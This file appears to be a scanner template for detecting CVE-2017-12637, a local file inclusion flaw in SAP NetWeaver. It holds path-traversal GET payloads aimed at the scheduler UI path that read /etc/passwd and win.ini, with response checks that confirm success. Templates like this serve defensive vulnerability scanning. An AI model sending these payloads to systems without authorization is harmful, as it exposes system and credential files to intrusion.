id: sap-netweaver-lfi
info:
  name: SAP Netweaver LFI (CVE-2017-12637)
  risk: High
  confidence: Tentative

params:
  - root: "{{.BaseURL}}"

variables:
  - prefix: |
      /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS
      /scheduler/ui/js/4c540510/UIUtilJavaScriptJS
      /scheduler/ui/js/

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.prefix}}?../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "bin/bash")
  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.prefix}}?../..//../..//../..//../..//../..//../..//../..//../..//Windows/win.ini
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "[extensions]") && StringSearch("response", "[fonts]")

  - method: GET
    redirect: false
    url: >-
      {{.root}}{{.prefix}}?../
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "WEB-INF") && StringSearch("response", "META-INF") && StringSearch("response", "ui") && StringSearch("response", "text/javascript")

references:
  - link: https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf